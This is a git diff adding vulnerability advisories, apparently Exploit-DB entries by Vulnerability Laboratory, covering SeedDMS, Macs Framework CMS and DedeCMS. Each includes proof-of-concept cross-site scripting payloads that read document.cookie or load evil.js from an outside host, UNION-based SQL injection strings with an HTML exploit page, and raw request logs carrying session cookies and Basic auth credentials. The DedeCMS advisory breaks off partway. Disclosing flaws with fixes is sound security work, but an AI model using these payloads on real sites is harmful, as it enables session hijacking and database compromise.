+Vary: Accept-Encoding
+Content-Encoding: gzip
+Content-Length: 2973
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+-
+https://SeedDMS.localhost:8080/op/op.AddEvent.php
+Host: SeedDMS.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 356
+Origin: https://SeedDMS.localhost:8080
+Connection: keep-alive
+Referer: https://SeedDMS.localhost:8080/out/out.AddEvent.php
+Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
+from=2020-04-13&to=2020-04-13
+&name=>"<iframe src=evil.source
+onload=alert(document.cookie)></iframe>&comment=>"<iframe
+src=evil.source onload=alert(document.cookie)></iframe>
+-
+POST: HTTP/1.1 302 Found
+Server: Apache/2.4.25 (Debian)
+Location: ../out/out.Calendar.php?mode=w&day=13&year=2020&month=04
+Content-Length: 0
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+Note: Injection Point via Calender op.AddEvent Name & Comment
+
+
+
+--- PoC Session Logs (GET) ---
+https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname=20200413.log
+Host: SeedDMS.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept: text/html, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+X-Requested-With: XMLHttpRequest
+Connection: keep-alive
+Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php
+Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
+-
+GET: HTTP/1.1 200 OK
+Server: Apache/2.4.25 (Debian)
+Vary: Accept-Encoding
+Content-Encoding: gzip
+Content-Length: 273
+Keep-Alive: timeout=5, max=94
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+-
+https://SeedDMS.localhost:8080/out/evil.source
+Host: SeedDMS.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php
+Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312
+Upgrade-Insecure-Requests: 1
+-
+GET: HTTP/1.1 302 Found
+Server: Apache/2.4.25 (Debian)
+Location: /out/out.ViewFolder.php
+Content-Length: 0
+Keep-Alive: timeout=5, max=93
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+Note: Execution Point via Log Management (AP) on Webdav View or Web View
+
+
+
+Reference(s):
+https://SeedDMS.localhost:8080/
+https://SeedDMS.localhost:8080/op/op.AddEvent.php
+https://SeedDMS.localhost:8080/out/out.ViewFolder.php
+https://SeedDMS.localhost:8080/out/out.AddEvent.php
+https://SeedDMS.localhost:8080/out/out.LogManagement.php
+https://SeedDMS.localhost:8080/out/out.Calendar.php?mode=
+https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname=
+
+
+Solution - Fix & Patch:
+=======================
+1. Parse and escape the name and comment input field on transmit to sanitize
+2. Filter and restrict the input field of the name and comments
+parameter for special chars to prevent injects
+3. Parse the output location of all web and webdav logfiles to prevent
+the execution point
+
+
+Security Risk:
+==============
+The security risk of the persistent cross site web vulnerabilities in
+the seeddms web-application are estimated as medium.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains: www.vulnerability-lab.com www.vuln-lab.com
+www.vulnerability-db.com
+Services: magazine.vulnerability-lab.com
+paste.vulnerability-db.com infosec.vulnerability-db.com
+Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
+youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+ Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+
+
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
\ No newline at end of file
diff --git a/exploits/php/webapps/48325.txt b/exploits/php/webapps/48325.txt
new file mode 100644
index 000000000..0cb46c90a
--- /dev/null
+++ b/exploits/php/webapps/48325.txt
@@ -0,0 +1,482 @@
+# Title: Macs Framework 1.14f CMS - Persistent Cross-Site Scripting
+# Author: Vulnerability Laboratory
+# Date: 2020-04-15
+# Software Link: https://sourceforge.net/projects/macs-framework/files/latest/download
+# CVE: N/A
+
+Document Title:
+===============
+Macs Framework v1.14f CMS - Multiple Web Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2206
+
+
+Release Date:
+=============
+2020-04-14
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2206
+
+
+Common Vulnerability Scoring System:
+====================================
+7.4
+
+
+Vulnerability Class:
+====================
+Multiple
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+Macs CMS is a Flat File (XML and SQLite) based AJAX Content Management
+System. It focuses mainly on the
+Edit In Place editing concept. It comes with a built in blog with
+moderation support, user manager section,
+roles manager section, SEO / SEF URL.
+https://sourceforge.net/projects/macs-framework/files/latest/download
+
+(Copy of the Homepage: https://sourceforge.net/projects/macs-framework/ )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple web
+vulnerabilities in the official Macs Framework v1.1.4f CMS.
+
+
+Affected Product(s):
+====================
+Macrob7
+Product: Macs Framework v1.14f - Content Management System
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-14: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Authentication Type:
+====================
+Restricted authentication (user/moderator) - User privileges
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+1.1 & 1.2
+Multiple non-persistent cross site scripting web vulnerabilities has
+been discovered in the official Mac Framework v1.1.4f Content Managament
+System.
+The vulnerability allows remote attackers to manipulate client-side
+browser to web-applicatio requests to compromise user sesson credentials
+or to
+manipulate module content.
+
+The first vulnerability is located in the search input field of the
+search module. Remote attackers are able to inject own malicious script
+code as
+search entry to execute the code within the results page that is loaded
+shortly after the request is performed. The request method to inject is
+POST
+and the attack vector is located on the client-side with non-persistent
+attack vector.
+
+The second vulnerability is located in the email input field of the
+account reset function. Remote attackers are able to inject own
+malicious script code as
+email to reset the passwort to execute the code within performed
+request. The request method to inject is POST and the attack vector is
+located on the
+client-side with non-persistent attack vector.
+
+Successful exploitation of the vulnerabilities results in session
+hijacking, non-persistent phishing attacks, non-persistent external
+redirects to
+malicious source and non-persistent manipulation of affected or
+connected application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Parameter(s):
+[+] searchString
+[+] emailAdress
+
+
+1.3
+Multiple remote sql-injection web vulnerabilities has been discovered in
+the official Mac Framework v1.1.4f Content Managament System.
+The vulnerability allows remote attackers to inject or execute own sql
+commands to compromise the dbms or file system of the application.
+
+The sql injection vulnerabilities are located in the `roleId` and
+`userId` of the `editRole` and `deletUser` module. The request method to
+inject or execute commands is GET and the attack vector is located on
+the application-side. Attackers with privileged accounts to edit are
+able to inject own sql queries via roleid and userid on deleteUser or
+editRole. Multiple unhandled and broken sql queries are visible as default
+debug to output for users as well.
+
+Exploitation of the remote sql injection vulnerability requires no user
+interaction and a privileged web-application user account.
+Successful exploitation of the remote sql injection results in database
+management system, web-server and web-application compromise.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] deleteUser
+[+] editRole
+
+Vulnerable Parameter(s):
+[+] userId
+[+] roleId
+
+
+Proof of Concept (PoC):
+=======================
+Google Dork(s): intitle, subtitle & co.
+Site Powered by Mac's PHP MVC Framework Framework of the future
+Design downloaded from Zeroweb.org: Free website templates, layouts, and
+tools.
+
+
+1.1
+The non-persistent cross site scripting web vulnerability can be
+exploited by remote attackers without user account and with low user
+interaction.
+For security demonstration or to reproduce the cross site scripting web
+vulnerability follow the provided information and steps below to continue.
+
+
+PoC: Payload
+>">"<iframe src=evil.source
+onload=alert(document.cookie)>&scrollPosition=0&scrollPosition=0
+
+
+PoC: Vulnerable Source
+<form method="post"
+action="https://macs-cms.localhost:8080/index.php/search" id="searchForm">
+<span class="searchLabel">Search Site:</span><input type="searchString"
+value="" name="searchString" class="searchString">
+<input type="submit" value="Search" class="searchSubmit">
+</form><br>
+<span class="error">No Results found for: "<iframe src="evil.source"
+onload="alert(document.cookie)"></span>
+
+
+--- PoC Session Logs [POST] ---
+https://macs-cms.localhost:8080/index.php/search
+Host: macs-cms.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 112
+Origin: https://macs-cms.localhost:8080
+Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
+Connection: keep-alive
+Referer: https://macs-cms.localhost:8080/index.php
+Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652;
+Upgrade-Insecure-Requests: 1
+searchString=>">"<iframe src=evil.source
+onload=alert(document.cookie)>&scrollPosition=0&scrollPosition=0
+-
+POST: HTTP/1.1 200 OK
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
+pre-check=0
+Pragma: no-cache
+Content-Type: text/html; charset=UTF-8
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Server: Microsoft-IIS/8.5
+X-Powered-By: ASP.NET
+X-Powered-By-Plesk: PleskWin
+Content-Length: 9865
+
+
+1.2
+The non-persistent cross site scripting web vulnerability can be
+exploited by remote attackers without user account and with low user
+interaction.
+For security demonstration or to reproduce the cross site scripting web
+vulnerability follow the provided information and steps below to continue.
+
+
+PoC: Exploitation
+test"<iframe src=evil.source onload=alert(document.cookie)>@gmail.com
+
+
+PoC: Vulnerable Source
+<form method="post"
+action="https://macs-cms.localhost:8080/index.php/main/cms/login"
+class="ajax" ajaxoutput="#loginMessage">
+ <table style="width:100%">
+ <tbody><tr>
+ <td style="width: 20px">Username:</td>
+ <td><input type="text" name="username"></td>
+ </tr>
+ <tr>
+ <td>Password:</td>
+ <td><input type="password" name="password"></td>
+ </tr>
+ <tr>
+ <td colspan="2"><input type="submit" value="Login"></td>
+ </tr>
+ <tr>
+ <td colspan="2"><br><div id="loginMessage" style="display:
+block;">Invalid Username or Password</div></td>
+ </tr>
+ </tbody></table>
+ <br>
+ <a
+href="https://macs-cms.localhost:8080/index.php/main/cms/forgotPassword"
+class="ajax" ajaxoutput="#forgotPassword">Forgot Password</a>
+<input type="hidden" name="scrollPosition" value="102"></form>
+<div id="forgotPassword" style="display: block;">
+<form class="ajax" method="post"
+action="https://macs-cms.localhost:8080/index.php/main/cms/forgotPasswordProcess"
+ajaxoutput="#forgotPasswordReturn">
+ Enter your email address: <input type="text" name="emailAddress"><br>
+ <input type="submit" value="Send Email">
+</form>
+<br>
+<div id="forgotPasswordReturn" style="display: block;">Cannot find user
+with Email address:
+test"<iframe src=evil.source
+onload=alert(document.cookie)>@gmail.com</iframe></div>
+</div>
+
+
+
+--- PoC Session Logs [POST] ---
+https://macs-cms.localhost:8080/index.php/main/cms/forgotPassword
+Host: macs-cms.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Content-Length: 17
+Origin: https://macs-cms.localhost:8080
+Connection: keep-alive
+Referer: https://macs-cms.localhost:8080/index.php/main/cms/login
+Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652;
+ajaxRequest=true
+-
+POST: HTTP/1.1 200 OK
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
+pre-check=0
+Pragma: no-cache
+Content-Type: text/html; charset=ISO-8859-1
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Server: Microsoft-IIS/8.5
+X-Powered-By: ASP.NET
+X-Powered-By-Plesk: PleskWin
+Content-Length: 335
+-
+https://macs-cms.localhost:8080/index.php/main/cms/forgotPasswordProcess
+Host: macs-cms.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+Content-Length: 123
+Origin: https://macs-cms.localhost:8080
+Connection: keep-alive
+Referer: https://macs-cms.localhost:8080/index.php/main/cms/login
+Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652;
+ajaxRequest=true&=&emailAddress=test"<iframe src=evil.source
+onload=alert(document.cookie)>@gmail.com
+-
+POST: HTTP/1.1 200 OK
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
+pre-check=0
+Pragma: no-cache
+Content-Type: text/html; charset=ISO-8859-1
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Server: Microsoft-IIS/8.5
+X-Powered-By: ASP.NET
+X-Powered-By-Plesk: PleskWin
+Content-Length: 105
+
+
+1.3
+The remote sql injection web vulnerability can be exploited by remote
+attackers with privileged application user account and without user
+interaction.
+For security demonstration or to reproduce the cross site scripting web
+vulnerability follow the provided information and steps below to continue.
+
+
+PoC: Payload
+%27-1%20order%20by%205--
+%27-1%20union select 1,2,3,4,@@version--
+
+
+PoC: Exploitation
+<html>
+<head><body><title>Mac's CMS SQL Injection PoC</title>
+<iframe
+src=https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId=%27-1%20order%20by%205--%20>
+<iframe
+src=https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId=%27-1%20union
+select 1,2,3,4,@@version--%20>
+<iframe
+src=https://macs-cms.localhost:8080/index.php/main/cms/deleteUser?userId=%27-1%20order%20by%205--%20>
+<iframe
+src=https://macs-cms.localhost:8080/index.php/main/cms/deleteUser?userId=%27-1%20union
+select 1,2,3,4,@@version--%20>
+</body></head>
+</html>
+
+
+--- PoC Session Logs [GET] ---
+https://macs-cms.localhost:8080/index.php/main/cms/editRole?roleId='-1
+order by 5--
+Host: macs-cms.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+Cookie: __utma=72517782.1164807459.1586620290.1586620290.1586620290.1;
+Upgrade-Insecure-Requests: 1
+-
+GET: HTTP/1.1 200 OK
+Content-Type: text/html; charset=UTF-8
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Server: Microsoft-IIS/8.5
+X-Powered-By: ASP.NET
+X-Powered-By-Plesk: PleskWin
+Content-Length: 53
+
+
+--- [SQL Error Exception Logs] ---
+SQLSTATE[HY000]: General error: 1 near "1": syntax error
+-
+Error executing SQL statement
+SQLSTATE[HY000]: General error: 1 unrecognized token: "''';"
+-
+Error executing SQL statement
+SQLSTATE[HY000]: General error: 1 1st ORDER BY term out of range -
+should be between 1 and 5
+-
+5.0.12 'pwnd
+This page was created in 1.5665068626404 seconds
+
+
+Security Risk:
+==============
+1.1 & 1.2
+the security risk of the client-side cross site scripting web
+vulnerabilities in the search and email reset function are estimated as
+medium.
+
+1.3
+The security risk of the remote sql injection web vulnerabilities in the
+id parameters on delete are estimated as high.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains: www.vulnerability-lab.com www.vuln-lab.com
+www.vulnerability-db.com
+Services: magazine.vulnerability-lab.com
+paste.vulnerability-db.com infosec.vulnerability-db.com
+Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
+youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+ Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+
+
+
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
\ No newline at end of file
diff --git a/exploits/php/webapps/48326.txt b/exploits/php/webapps/48326.txt
new file mode 100644
index 000000000..8a6dbdd15
--- /dev/null
+++ b/exploits/php/webapps/48326.txt
@@ -0,0 +1,363 @@
+# Title: DedeCMS 7.5 SP2 - Persistent Cross-Site Scripting
+# Author: Vulnerability Laboratory
+# Date: 2020-04-15
+# Vendor Link: http://www.dedecms.com
+# Software Link: http://www.dedecms.com/products/dedecms/downloads/
+# CVE: N/A
+
+Document Title:
+===============
+DedeCMS v7.5 SP2 - Multiple Persistent Web Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2195
+
+
+Release Date:
+=============
+2020-04-09
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2195
+
+
+Common Vulnerability Scoring System:
+====================================
+4.3
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+500€ - 1.000€
+
+
+Product & Service Introduction:
+===============================
+Welcome to use the most professional PHP website content management
+system in China-Zhimeng content management system,
+he will be your first choice for easy website building. Adopt XML name
+space style core templates: all templates are
+saved in file form, which provides great convenience for users to design
+templates and website upgrade transfers.
+The robust template tags provide strong support for webmasters to DIY
+their own websites. High-efficiency tag caching
+mechanism: Allows the caching of similar tags. When generating HTML, it
+helps to improve the reaction speed of the
+system and reduce the resources consumed by the system.
+
+(Copy of the homepage: http://www.dedecms.com/products/dedecms/downloads/)
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple
+persistent cross site vulnerabilities in
+the official DedeCMS v5.7 SP2 (UTF8) web-application.
+
+
+Affected Product(s):
+====================
+DesDev Inc.
+Product: DedeCMS - Content Management System v5.7 SP2
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-09: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted authentication (user/moderator) - User privileges
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+Multiple persistent cross site scripting vulnerabilities has been
+discovered in the official DedeCMS v5.7 SP2 UTF8 web-application.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise browser to
+web-application requests from the application-side.
+
+The persistent script code inject web vulnerabilities are located in the
+`activepath`, `keyword`, `tag`, `fmdo=x&filename`, `CKEditor`
+and `CKEditorFuncNum`parameters of the `file_pic_view.php`,
+`file_manage_view.php`, `tags_main.php`, `select_media.php`,
+`media_main.php` files.
+The attack vector of the vulnerability is non-persistent and the request
+method to inject is POST. Successful exploitation of the vulnerability
+results in session hijacking, persistent phishing attacks, persistent
+external redirects to malicious source and persistent manipulation
+of affected or connected application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable File(s):
+[+] file_pic_view.php
+[+] file_manage_view.php
+[+] tags_main.php
+[+] select_media.php
+[+] media_main.php
+
+Vulnerable Parameter(s):
+[+] tag
+[+] keyword
+[+] activepath
+[+] fmdo=move&filename & fmdo=edit&filename
+[+] CKEditor & CKEditor=body&CKEditorFuncNum
+
+
+Proof of Concept (PoC):
+=======================
+The web vulnerabilities can be exploited by remote attackers with
+privileged user account and with low user interaction.
+For security demonstration or to reproduce the vulnerability follow the
+provided information and steps below to continue.
+
+
+Request: Examples
+https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=test&activepath=%2Fuploads
+https://test23.localhost:8080/dede/tags_main.php?tag=&orderby=total&orderway=desc
+https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=body&CKEditorFuncNum=2&langCode=en
+
+
+PoC: Payload
+".>"<img>"%20<img src=[Evil.Domain]/[Evil.Source].*
+onload=alert(document.domain)>
+>"%20<"<img="" src="https:/www.vulnerability-lab.com/gfx/logo-header.png
+onload=alert(document.domain)">
+>"><iframe src=evil.source onload=alert(document.domain)>
+%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E
+%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E
+%3E%22%3Cimg%20src=%22[Evil.Source]%22%3E%3Cimg%20src=%22[Evil.Source]%22%3E
+
+
+PoC: Exploitation
+<title>DedeCMS v5.7 SP2 UTF8 - Multiple Non Persistent XSS PoCs</title>
+<iframe
+src="https://test23.localhost:8080/dede/file_pic_view.php?activepath=%2Fuploads%3E%22%3Cimg%20src=%22[Evil.Source]%22%3E%3Cimg%20src=%22[Evil.Source]%22%3E">
+<iframe
+src="https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E&activepath=%2Fuploads">
+<iframe
+src="https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=test&activepath=%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E">
+<iframe
+src="https://test23.localhost:8080/dede/tags_main.php?tag=pwnd&orderway=%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E">
+<iframe
+src="https://test23.localhost:8080/dede/tags_main.php?tag=%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E&orderby=1&orderway=">
+<iframe
+src="https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=>"><iframe
+src=evil.source
+onload=alert(document.domain)>body&CKEditorFuncNum=2&langCode=en">
+<iframe
+src="https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=body&CKEditorFuncNum=>"><iframe
+src=evil.source onload=alert(document.domain)>2&langCode=en">
+...
+
+--- PoC Session Logs [POST] --- (Some Examples ...)
+https://test23.localhost:8080/dede/media_main.php
+Host: test23.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
+Gecko/20100101 Firefox/74.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 152
+Origin: https://test23.localhost:8080
+Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
+Connection: keep-alive
+Referer: https://test23.localhost:8080/dede/media_main.php
+Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=2et4s8ep51lasddnshjcco5ji3;
+DedeUserID=1; DedeUserID__ckMd5=936f42b01c3c7958;
+DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f;
+ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php
+keyword=>"%20<<img
+src=https://[Evil.Domain]/[Evil.Source].png>&mediatype=0&membertype=0&imageField.x=23&imageField.y=4
+-
+POST: HTTP/2.0 200 OK
+server: nginx
+content-type: text/html; charset=utf-8
+content-length: 1830
+expires: Thu, 19 Nov 1981 08:52:00 GMT
+pragma: no-cache
+cache-control: private
+set-cookie: ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php; expires=Mon,
+06-Apr-2020 17:53:23 GMT; Max-Age=3600; path=/
+vary: Accept-Encoding
+content-encoding: gzip
+x-powered-by: PHP/5.6.40, PleskLin
+X-Firefox-Spdy: h2
+---
+https://test23.localhost:8080/dede/file_pic_view.php
+?activepath=%2Fuploads%2F>"
+<"<img+src%3Dhttps%3A%2F%2Fwww.vulnerability-lab.com%2Fgfx%2Flogo-header.png>&imageField.x=0&imageField.y=0
+Host: test23.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
+Gecko/20100101 Firefox/74.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
+Connection: keep-alive
+Referer:
+https://test23.localhost:8080/dede/file_pic_view.php?activepath=&imageField.x=0&imageField.y=0
+Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=2et4s8ep51lasddnshjcco5ji3;
+DedeUserID=1; DedeUserID__ckMd5=936f42b01c3c7958;
+DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f;
+ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php%3Fdopost%3Dfilemanager
+Upgrade-Insecure-Requests: 1
+-
+GET: HTTP/2.0 200 OK
+server: nginx
+content-type: text/html; charset=utf-8
+x-powered-by: PHP/5.6.40
+expires: Thu, 19 Nov 1981 08:52:00 GMT
+pragma: no-cache
+cache-control: private
+X-Firefox-Spdy: h2
+---
+https://test23.localhost:8080/include/dialog/select_media.php?
+CKEditor=>"><iframe src=evil.source
+onload=alert("1")>body&CKEditorFuncNum=>"><iframe src=evil.source
+onload=alert("2")>2&langCode=en
+Host: test23.localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
+Gecko/20100101 Firefox/74.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
+Connection: keep-alive
+Cookie: PHPSESSID=2et4s8ep51lasddnshjcco5ji3; DedeUserID=1;
+DedeUserID__ckMd5=936f42b01c3c7958;
+DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f;
+ENV_GOBACK_URL=%2Fdede%2Ffeedback_main.php
+Upgrade-Insecure-Requests: 1
+-
+GET: HTTP/2.0 200 OK
+server: nginx
+content-type: text/html; charset=utf-8
+content-length: 1137
+expires: Thu, 19 Nov 1981 08:52:00 GMT
+cache-control: no-store, no-cache, must-revalidate, post-check=0,
+pre-check=0
+pragma: no-cache
+vary: Accept-Encoding
+content-encoding: gzip
+x-powered-by: PHP/5.6.40, PleskLin
+X-Firefox-Spdy: h2
+
+
+Reference(s):
+https://test23.localhost:8080/dede/media_main.php
+https://test23.localhost:8080/dede/tags_main.php
